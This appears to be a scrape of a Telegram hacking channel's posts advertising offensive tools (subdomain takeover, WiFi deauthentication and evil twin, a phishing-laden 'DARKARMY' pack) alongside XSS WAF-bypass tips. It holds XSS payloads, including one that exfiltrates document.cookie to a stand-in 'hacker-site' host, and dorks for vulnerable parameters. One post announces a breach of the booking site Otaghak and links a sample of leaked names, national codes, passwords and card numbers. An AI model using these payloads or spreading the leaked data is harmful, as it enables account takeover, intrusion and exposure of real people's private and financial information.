XSS WAF Bypass by multi-char HTML entities

fj translates to fj
>⃒ translates to > + [?]
&nvlt; translates to < + [?]

[?] - Unicode symbol

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

dnsX

A fast and multi-purpose DNS toolkit designed for running DNS queries

💬
dnsx is a fast and multi-purpose DNS toolkit designed for running various probes through the retryabledns library. It supports multiple DNS queries, user supplied resolvers, DNS wildcard filtering like shuffledns etc.

📊 Features:
⚪️ Simple and Handy utility to query DNS records.
⚪️ A, AAAA, CNAME, PTR, NS, MX, TXT, SRV, SOA query support
⚪️ DNS Resolution / Brute-force support
⚪️ Custom resolver input support
⚪️ Multiple resolver format (TCP/UDP/DOH/DOT) support
⚪️ stdin and stdout support
⚪️ Automatic wildcard handling support

🔼 Installation:
dnsx requires go1.21 to install successfully. Run the following command to install the latest version:

go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest

💻 Usage:

dnsx -h

😸 Github

⬇️ Download
🔒 BugCod3

#cli #dns #bruteforce #wildcard
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

AlterX

Fast and customizable subdomain wordlist generator using DSL.

📊 Features:

⚪️ Fast and Customizable
⚪️ Automatic word enrichment
⚪️ Pre-defined variables
⚪️ Configurable Patterns
⚪️ STDIN / List input

🔼 Installation:
To install alterx, you need to have Golang 1.19 installed on your system.

go install github.com/projectdiscovery/alterx/cmd/alterx@latest

💻 Examples:
An example of running alterx on existing list of passive subdomains of tesla.com yield us 10 additional NEW and valid subdomains resolved using dnsx.

chaos -d tesla.com | alterx | dnsx

Similarly -enrich option can be used to populate known subdomains as world input to generate target aware permutations.

chaos -d tesla.com | alterx -enrich

You can alter the default patterns at run time using -pattern CLI option.

chaos -d tesla.com | alterx -enrich -p '{{word}}-{{suffix}}'

It is also possible to overwrite existing variables value using -payload CLI options.

alterx -list tesla.txt -enrich -p '{{word}}-{{year}}.{{suffix}}' -pp word=keywords.txt -pp year=2023

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #Subdomain #Generator #DSL
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

We have created this topic for you members, so that if you have something to share, you can do it and work together as a group. I also suggest that if there is something missing in our channel or topic, tell us as soon as possible. We will quickly fix it or provide it for you

📣 Channel: T.me/BugCod3
👤 Group: T.me/BugCod3GP
📊 Topic: T.me/BugCod3Topic
👤 Contact: T.me/BugCod3BOT

🥬 BADUnboxing 🥬

💬
BADUnboxing is an automated Android unpacker. It works by locating and decompiling code inside the APK that is relevant to the unpacking process.
Once Bad Unboxing detects packing, it automatically generates a new Java application based on the decompiled code. This new application can be executed to drop dynamic unpacked artifacts to disk.

📊 Contribute:
⚪️ Make a pull request
⚪️ Add a new Unpacking Module
⚪️ Add an Example to our Wiki
⚪️ Report an error/issue
⚪️ Suggest an improvement
⚪️ Share with others or give a star!

😸 Github

⬇️ Download
🔒 BugCod3

#JAVA #Unpacker #Android
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Payload XSS:

<IFRAME SRC="javanoscript:prompt(document.cookie);"></iframe>

#Payload #XSS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

📢 The otaghak was hacked by irLeaks!


In short, we have the following:

- reservation information; including name and surname, reservation date, length of stay, payment fee, national code, contact number, email, etc.
- settlement information; Including the amount, bank information, denoscription, date
- messages and chats; including activation code or password, support messages and...
- Information including username, password, first and last name, gender, contact number, national code, IP address, user agent, etc.
- Payment information including payment denoscription, payment date, amount, payer information
- detailed information of bookable places; including exact address, longitude and latitude, city, zip code, etc.
- User search information including city, province, search filters, search time frame, amount, user ID, IP address, etc.
- Bank information including name and surname of the account holder, user name, Shaba number, bank name, card number
- Discount coupons and other general information

⬇️ Sample:
https://mega.nz/file/SFskzKBR#jmEvTv8RiAQqdeanoDbVisAgzgKyuDEA-eUxIES8ebU

#NEWS #Notifaction #irleaks #otaghak
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🛜 Freeway 🛜

WiFi Penetration Testing & Auditing Tool

💬
Freeway is a Python scapy-based tool for WiFi penetration that aim to help ethical hackers and pentesters develop their skills and knowledge in auditing and securing home or enterprise networks.

📊 Features:
⚪️ IEEE 802.11 Packet Monitoring
⚪️ Deauthentication Attack
⚪️ Beacon Flood
⚪️ Packet Fuzzer
⚪️ Network Audit
⚪️ Channel Hopper
⚪️ Evil Twin
⚪️ Packet Crafter

📂 Preparation:
⚪️ A network adapter supporting monitor mode and frame injection.
⚪️ An operating system running a Linux distribution.
⚪️ Python 3+ installed.

🔼 Installation:
PIP:

sudo pip install 3way

Manually:

cd Freeway
sudo pip install .

💻 Usage:

#1 sudo Freeway
#2 sudo Freeway -i wlan2 -a monitor -p 1,2,a
#3 sudo Freeway -i wlan2 -a deauth

😸 Github

⬇️ Download
🔒 BugCod3

#Python #Wifi #Pentesting
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Tips for XSS Bypass:

https://sub.target.com --> 403 (Forbidden)
https://sub.target.com/%3f/ --> 200 (OK)

dork for the vulnerable parameters

`site:*.target.com inurl:"?name="`and `site:*.target.com inurl:"?type="`

#BugBounty #Tips #XSS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Subzy

💬
Subdomain takeover tool which works based on matching response fingerprints from can-i-take-over-xyz

Installation:
👩‍💻

go install -v github.com/LukaSikic/subzy@latest

📊 Options:
Only required flag for run subcommand(r short version) is either --target or --targets

⚪️ --target (string) - Set single or multiple (comma separated) target subdomain/s

⚪️ --targets (string) - File name/path to list of subdomains

⚪️ --concurrency (integer) - Number of concurrent checks (default 10)

⚪️ --hide_fails (boolean) - Hide failed checks and invulnerable subdomains (default false)

⚪️ --https (boolean) - Use HTTPS by default if protocol not defined on targeted subdomain (default false)

⚪️ --timeout (integer) - HTTP request timeout in seconds (default 10)

⚪️ --verify_ssl (boolean) - If set to true, it won't check site with invalid SSL

💻 Usage:
Target subdomain can have protocol defined, if not http:// will be used by default if --https not specifically set to true.

⚪️ List of subdomains:

./subzy run --targets list.txt

⚪️ Single or multiple targets:

./subzy run --target test.google.com
./subzy run --target test.google.com,https://test.yahoo.com

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #Cybersecurity #Subdomain #Takeover
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🏴 I offer my condolences to all the Muslims of the world on Tasua and Ashura Hosseini 🏴
🖤
#Notifaction
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XSS Vectors Cheat Sheet

⬇️ Download

#XSS #Cheat #Sheet
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path

Exploit Author: Ex3ptionaL

Exploit Date: 2024-04-01

Vendor: https://www.eset.com

Version: 17.0.16.0

Tested on OS: Microsoft Windows 10 pro x64

🕷 Exploit-db

⬇️ Download

#Exploit #ESET #NOD32
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LernExploit
📣 T.me/A3l3_KA4

Change IP Address Every 3 Seconds

⬇️ Download + (Readme.txt)
🔒 BugCod3

#Tor #Net #IP
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

DARKARMY is a Collection Of Penetration Testing Tools, you will have every noscript that a hacker needs

👤 Information Gathering:
⚪️ Nmap
⚪️ Setoolkit
⚪️ Port Scanning
⚪️ Host to IP
⚪️ Wordpress User
⚪️ CMS Scanner
⚪️ XSStrike
⚪️ Dork - Google Dorks Passive Vulnerability Auditor
⚪️ Scan A server's Users
⚪️ Crips

🔓 Password Attacks:
⚪️ CUpp
⚪️ Ncrack

🛜 Wireless Testing:
⚪️ reaver
⚪️ pixiewps
⚪️ Fluxion

🌍 Exploitaition Tools:
⚪️ ATSCAN
⚪️ sqlmap
⚪️ Shellnoob
⚪️ commix
⚪️ FTP auto Bypass
⚪️ jboss-autopwn

📂 Social Engineering:
⚪️ Setoolkit
⚪️ SSLtrip
⚪️ pyPHISHER
⚪️ ZPHISHER

🧑‍💻 Web Hacking:
⚪️ Drupal Hacking
⚪️ Inurlbr
⚪️ Wordpress & Joomla Scanner
⚪️ Gravity From Scanner
⚪️ File Upload Checker
⚪️ Wordpress Exploit & Plugins Scanner
⚪️ Shell and Directory Finder
⚪️ Joomla! 1.5 - 3.4.5 remote code execution
⚪️ Vbulletin 5.X remote code execution
⚪️ BruteX - Automatically brute force all services running on a target
⚪️ Arachni - Web Application Security Scanner Framework

And ...

🔼 Installation:
This Tool Must Run As ROOT !!!

cd DARKARMY
chmod +x install.sh
./install.sh

That's it. You can execute tool by typing DARKARMY

You can also use this tool inside the Termux of the phone

😸 Github
🎞 Youtube (Demo)

⬇️ Download
🔒 BugCod3

#Hacking #Tools #Pack #Penetration
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Reflected XSS may lead to ATO

Payload:

"><noscript>alert(document.cookie)</noscript>

Simple Tip:

cat parameters.txt | grep ".php?" > php-params.txt

Test php-params.txt for: sqli, xss, html injection...etc

Attacking Cookies:

https://sub.target.com/en/test.php?vuln-param="><noscript>document.write('<img src="https://hacker-site/thing/?c='%2bdocument.cookie%2b'" />');</noscript

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🎆 congratulation 🎆 3️⃣🔤 🔴